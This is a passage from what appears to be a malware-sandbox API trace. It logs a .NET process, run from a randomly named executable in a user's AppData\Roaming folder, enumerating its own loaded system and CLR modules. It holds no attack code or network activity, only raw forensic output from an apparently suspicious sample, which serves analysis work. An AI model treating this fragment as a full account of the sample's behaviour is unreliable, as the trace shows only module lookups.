CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.515] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x764c0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0145.516] CoTaskMemFree (pv=0x55b0d0) [0145.516] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.516] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x764c0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSASN1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll")) returned 0x1e [0145.518] CoTaskMemFree (pv=0x55b0d0) [0145.518] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f960000, lpmodinfo=0x2434cd0, cb=0xc | out: lpmodinfo=0x2434cd0*(lpBaseOfDll=0x6f960000, SizeOfImage=0x10000, EntryPoint=0x6f964600)) returned 1 [0145.519] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.519] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f960000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="mskeyprotect.dll") returned 0x10 [0145.520] CoTaskMemFree (pv=0x55b0d0) [0145.520] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.520] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f960000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll")) returned 0x24 [0145.522] CoTaskMemFree (pv=0x55b0d0) [0145.522] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f940000, lpmodinfo=0x2437000, cb=0xc | out: lpmodinfo=0x2437000*(lpBaseOfDll=0x6f940000, SizeOfImage=0x20000, EntryPoint=0x6f94d120)) returned 1 [0145.523] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.523] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f940000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ncrypt.dll") returned 0xa [0145.524] CoTaskMemFree (pv=0x55b0d0) [0145.524] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.524] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f940000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll")) returned 0x1e [0145.528] CoTaskMemFree (pv=0x55b0d0) [0145.528] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f910000, lpmodinfo=0x243910c, cb=0xc | out: lpmodinfo=0x243910c*(lpBaseOfDll=0x6f910000, SizeOfImage=0x2c000, EntryPoint=0x6f92bb10)) returned 1 [0145.530] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.530] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f910000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="NTASN1.dll") returned 0xa [0145.531] CoTaskMemFree (pv=0x55b0d0) [0145.531] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.531] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f910000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\NTASN1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll")) returned 0x1e [0145.532] CoTaskMemFree (pv=0x55b0d0) [0145.532] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f8f0000, lpmodinfo=0x243b218, cb=0xc | out: lpmodinfo=0x243b218*(lpBaseOfDll=0x6f8f0000, SizeOfImage=0x1a000, EntryPoint=0x6f8ffa70)) returned 1 [0145.534] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.534] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f8f0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ncryptsslp.dll") returned 0xe [0145.535] CoTaskMemFree (pv=0x55b0d0) [0145.535] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.535] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f8f0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll")) returned 0x22 [0145.536] CoTaskMemFree (pv=0x55b0d0) [0145.537] CloseHandle (hObject=0x2a0) returned 1 [0145.570] GetCurrentProcessId () returned 0xbb4 [0145.570] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbb4) returned 0x2a0 [0145.570] EnumProcessModules (in: hProcess=0x2a0, lphModule=0x2352400, cb=0x100, lpcbNeeded=0x19e600 | out: lphModule=0x2352400, lpcbNeeded=0x19e600) returned 1 [0145.572] EnumProcessModules (in: hProcess=0x2a0, lphModule=0x235250c, cb=0x200, lpcbNeeded=0x19e600 | out: lphModule=0x235250c, lpcbNeeded=0x19e600) returned 1 [0145.575] GetModuleInformation (in: hProcess=0x2a0, hModule=0x400000, lpmodinfo=0x235274c, cb=0xc | out: lpmodinfo=0x235274c*(lpBaseOfDll=0x400000, SizeOfImage=0x8000, EntryPoint=0x0)) returned 1 [0145.575] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.575] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x400000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe") returned 0x3a [0145.575] CoTaskMemFree (pv=0x55b0d0) [0145.575] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.575] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x400000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe")) returned 0x60 [0145.575] CoTaskMemFree (pv=0x55b0d0) [0145.575] GetModuleInformation (in: hProcess=0x2a0, hModule=0x771d0000, lpmodinfo=0x2354958, cb=0xc | out: lpmodinfo=0x2354958*(lpBaseOfDll=0x771d0000, SizeOfImage=0x17b000, EntryPoint=0x0)) returned 1 [0145.576] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.576] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x771d0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0145.576] CoTaskMemFree (pv=0x55b0d0) [0145.576] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.576] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x771d0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")) returned 0x1d [0145.576] CoTaskMemFree (pv=0x55b0d0) [0145.576] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f850000, lpmodinfo=0x2356a5c, cb=0xc | out: lpmodinfo=0x2356a5c*(lpBaseOfDll=0x6f850000, SizeOfImage=0x59000, EntryPoint=0x6f860780)) returned 1 [0145.576] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.576] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f850000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="MSCOREE.DLL") returned 0xb [0145.577] CoTaskMemFree (pv=0x55b0d0) [0145.577] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.577] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f850000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSCOREE.DLL" (normalized: "c:\\windows\\syswow64\\mscoree.dll")) returned 0x1f [0145.577] CoTaskMemFree (pv=0x55b0d0) [0145.577] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76720000, lpmodinfo=0x2358b68, cb=0xc | out: lpmodinfo=0x2358b68*(lpBaseOfDll=0x76720000, SizeOfImage=0xe0000, EntryPoint=0x76733980)) returned 1 [0145.577] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.577] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76720000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="KERNEL32.dll") returned 0xc [0145.577] CoTaskMemFree (pv=0x55b0d0) [0145.577] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.577] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76720000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNEL32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0145.578] CoTaskMemFree (pv=0x55b0d0) [0145.578] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76910000, lpmodinfo=0x235ac7c, cb=0xc | out: lpmodinfo=0x235ac7c*(lpBaseOfDll=0x76910000, SizeOfImage=0x17e000, EntryPoint=0x769c1b90)) returned 1 [0145.578] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.578] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76910000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0145.578] CoTaskMemFree (pv=0x55b0d0) [0145.578] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.578] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76910000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNELBASE.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")) returned 0x22 [0145.579] CoTaskMemFree (pv=0x55b0d0) [0145.579] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73e50000, lpmodinfo=0x235cdc4, cb=0xc | out: lpmodinfo=0x235cdc4*(lpBaseOfDll=0x73e50000, SizeOfImage=0x92000, EntryPoint=0x73e90380)) returned 1 [0145.579] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.579] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73e50000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0145.579] CoTaskMemFree (pv=0x55b0d0) [0145.579] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.579] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73e50000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")) returned 0x1f [0145.579] CoTaskMemFree (pv=0x55b0d0) [0145.579] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76600000, lpmodinfo=0x235eed0, cb=0xc | out: lpmodinfo=0x235eed0*(lpBaseOfDll=0x76600000, SizeOfImage=0x7b000, EntryPoint=0x7661e970)) returned 1 [0145.580] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.580] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76600000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0145.580] CoTaskMemFree (pv=0x55b0d0) [0145.580] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.580] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76600000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0145.580] CoTaskMemFree (pv=0x55b0d0) [0145.580] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76a90000, lpmodinfo=0x2360fe4, cb=0xc | out: lpmodinfo=0x2360fe4*(lpBaseOfDll=0x76a90000, SizeOfImage=0xbe000, EntryPoint=0x76ac5630)) returned 1 [0145.581] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.581] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76a90000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0145.581] CoTaskMemFree (pv=0x55b0d0) [0145.581] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.581] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76a90000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")) returned 0x1e [0145.581] CoTaskMemFree (pv=0x55b0d0) [0145.581] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76cb0000, lpmodinfo=0x23630f0, cb=0xc | out: lpmodinfo=0x23630f0*(lpBaseOfDll=0x76cb0000, SizeOfImage=0x44000, EntryPoint=0x76cc9d80)) returned 1 [0145.582] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.582] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76cb0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0145.582] CoTaskMemFree (pv=0x55b0d0) [0145.582] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.582] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76cb0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")) returned 0x1f [0145.582] CoTaskMemFree (pv=0x55b0d0) [0145.582] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76c00000, lpmodinfo=0x2365248, cb=0xc | out: lpmodinfo=0x2365248*(lpBaseOfDll=0x76c00000, SizeOfImage=0xad000, EntryPoint=0x76c14f00)) returned 1 [0145.583] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.583] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76c00000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0145.583] CoTaskMemFree (pv=0x55b0d0) [0145.583] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.583] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76c00000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\RPCRT4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")) returned 0x1e [0145.584] CoTaskMemFree (pv=0x55b0d0) [0145.584] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f00000, lpmodinfo=0x2367354, cb=0xc | out: lpmodinfo=0x2367354*(lpBaseOfDll=0x73f00000, SizeOfImage=0x1e000, EntryPoint=0x73f0b640)) returned 1 [0145.584] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.584] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f00000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0145.584] CoTaskMemFree (pv=0x55b0d0) [0145.584] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.584] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f00000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SspiCli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")) returned 0x1f [0145.585] CoTaskMemFree (pv=0x55b0d0) [0145.585] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73ef0000, lpmodinfo=0x2369460, cb=0xc | out: lpmodinfo=0x2369460*(lpBaseOfDll=0x73ef0000, SizeOfImage=0xa000, EntryPoint=0x73ef2a00)) returned 1 [0145.585] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.585] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73ef0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0145.586] CoTaskMemFree (pv=0x55b0d0) [0145.586] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.586] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73ef0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")) returned 0x21 [0145.586] CoTaskMemFree (pv=0x55b0d0) [0145.586] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76840000, lpmodinfo=0x236b574, cb=0xc | out: lpmodinfo=0x236b574*(lpBaseOfDll=0x76840000, SizeOfImage=0x58000, EntryPoint=0x768825c0)) returned 1 [0145.587] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.587] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76840000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="bcryptPrimitives.dll") returned 0x14 [0145.587] CoTaskMemFree (pv=0x55b0d0) [0145.587] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.587] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76840000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")) returned 0x28 [0145.589] CoTaskMemFree (pv=0x55b0d0) [0145.589] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6c430000, lpmodinfo=0x236d6a8, cb=0xc | out: lpmodinfo=0x236d6a8*(lpBaseOfDll=0x6c430000, SizeOfImage=0x7d000, EntryPoint=0x6c440db0)) returned 1 [0145.590] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.590] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6c430000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="mscoreei.dll") returned 0xc [0145.590] CoTaskMemFree (pv=0x55b0d0) [0145.590] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.590] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6c430000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")) returned 0x3a [0145.590] CoTaskMemFree (pv=0x55b0d0) [0145.590] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76d00000, lpmodinfo=0x236f7f0, cb=0xc | out: lpmodinfo=0x236f7f0*(lpBaseOfDll=0x76d00000, SizeOfImage=0x45000, EntryPoint=0x76d1de90)) returned 1 [0145.591] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.591] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76d00000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0145.591] CoTaskMemFree (pv=0x55b0d0) [0145.591] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.591] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76d00000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SHLWAPI.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")) returned 0x1f [0145.592] CoTaskMemFree (pv=0x55b0d0) [0145.592] GetModuleInformation (in: hProcess=0x2a0, hModule=0x762b0000, lpmodinfo=0x23718fc, cb=0xc | out: lpmodinfo=0x23718fc*(lpBaseOfDll=0x762b0000, SizeOfImage=0x1bd000, EntryPoint=0x76392a10)) returned 1 [0145.592] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.592] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x762b0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="combase.dll") returned 0xb [0145.593] CoTaskMemFree (pv=0x55b0d0) [0145.593] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.593] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x762b0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")) returned 0x1f [0145.594] CoTaskMemFree (pv=0x55b0d0) [0145.594] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74ab0000, lpmodinfo=0x2373a08, cb=0xc | out: lpmodinfo=0x2373a08*(lpBaseOfDll=0x74ab0000, SizeOfImage=0x14f000, EntryPoint=0x74b66820)) returned 1 [0145.595] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.595] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74ab0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0145.595] CoTaskMemFree (pv=0x55b0d0) [0145.595] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.595] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74ab0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\GDI32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")) returned 0x1d [0145.596] CoTaskMemFree (pv=0x55b0d0) [0145.596] GetModuleInformation (in: hProcess=0x2a0, hModule=0x743d0000, lpmodinfo=0x2375b98, cb=0xc | out: lpmodinfo=0x2375b98*(lpBaseOfDll=0x743d0000, SizeOfImage=0x147000, EntryPoint=0x743e1cf0)) returned 1 [0145.596] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.596] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x743d0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0145.597] CoTaskMemFree (pv=0x55b0d0) [0145.597] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.597] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x743d0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\USER32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")) returned 0x1e [0145.598] CoTaskMemFree (pv=0x55b0d0) [0145.598] GetModuleInformation (in: hProcess=0x2a0, hModule=0x741b0000, lpmodinfo=0x2377ca4, cb=0xc | out: lpmodinfo=0x2377ca4*(lpBaseOfDll=0x741b0000, SizeOfImage=0x2b000, EntryPoint=0x741b5680)) returned 1 [0145.598] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.598] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x741b0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0145.599] CoTaskMemFree (pv=0x55b0d0) [0145.599] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.599] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x741b0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IMM32.DLL" (normalized: "c:\\windows\\syswow64\\imm32.dll")) returned 0x1d [0145.600] CoTaskMemFree (pv=0x55b0d0) [0145.600] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76d50000, lpmodinfo=0x2379da8, cb=0xc | out: lpmodinfo=0x2379da8*(lpBaseOfDll=0x76d50000, SizeOfImage=0xc000, EntryPoint=0x76d53930)) returned 1 [0145.600] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.600] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76d50000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="kernel.appcore.dll") returned 0x12 [0145.601] CoTaskMemFree (pv=0x55b0d0) [0145.601] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.601] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76d50000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")) returned 0x26 [0145.602] CoTaskMemFree (pv=0x55b0d0) [0145.602] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f840000, lpmodinfo=0x237bed4, cb=0xc | out: lpmodinfo=0x237bed4*(lpBaseOfDll=0x6f840000, SizeOfImage=0x8000, EntryPoint=0x6f8417b0)) returned 1 [0145.602] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.602] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f840000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0145.603] CoTaskMemFree (pv=0x55b0d0) [0145.603] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.603] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f840000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\VERSION.dll" (normalized: "c:\\windows\\syswow64\\version.dll")) returned 0x1f [0145.605] CoTaskMemFree (pv=0x55b0d0) [0145.605] GetModuleInformation (in: hProcess=0x2a0, hModule=0x69370000, lpmodinfo=0x237dfe0, cb=0xc | out: lpmodinfo=0x237dfe0*(lpBaseOfDll=0x69370000, SizeOfImage=0x6e1000, EntryPoint=0x6939cd70)) returned 1 [0145.606] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.606] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x69370000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="clr.dll") returned 0x7 [0145.606] CoTaskMemFree (pv=0x55b0d0) [0145.606] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.606] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x69370000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")) returned 0x35 [0145.607] CoTaskMemFree (pv=0x55b0d0) [0145.607] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6a880000, lpmodinfo=0x2380110, cb=0xc | out: lpmodinfo=0x2380110*(lpBaseOfDll=0x6a880000, SizeOfImage=0xf5000, EntryPoint=0x6a8d4160)) returned 1 [0145.608] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.608] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6a880000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="MSVCR120_CLR0400.dll") returned 0x14 [0145.608] CoTaskMemFree (pv=0x55b0d0) [0145.608] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.608] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6a880000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSVCR120_CLR0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll")) returned 0x28 [0145.609] CoTaskMemFree (pv=0x55b0d0) [0145.609] GetModuleInformation (in: hProcess=0x2a0, hModule=0x680b0000, lpmodinfo=0x2382244, cb=0xc | out: lpmodinfo=0x2382244*(lpBaseOfDll=0x680b0000, SizeOfImage=0x12b2000, EntryPoint=0x0)) returned 1 [0145.609] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.609] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x680b0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="mscorlib.ni.dll") returned 0xf [0145.610] CoTaskMemFree (pv=0x55b0d0) [0145.610] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.610] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x680b0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll")) returned 0x68 [0145.610] CoTaskMemFree (pv=0x55b0d0) [0145.610] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74dc0000, lpmodinfo=0x23843ec, cb=0xc | out: lpmodinfo=0x23843ec*(lpBaseOfDll=0x74dc0000, SizeOfImage=0xeb000, EntryPoint=0x74dfd650)) returned 1 [0145.611] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.611] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74dc0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0145.612] CoTaskMemFree (pv=0x55b0d0) [0145.612] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.612] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74dc0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0145.612] CoTaskMemFree (pv=0x55b0d0) [0145.612] GetModuleInformation (in: 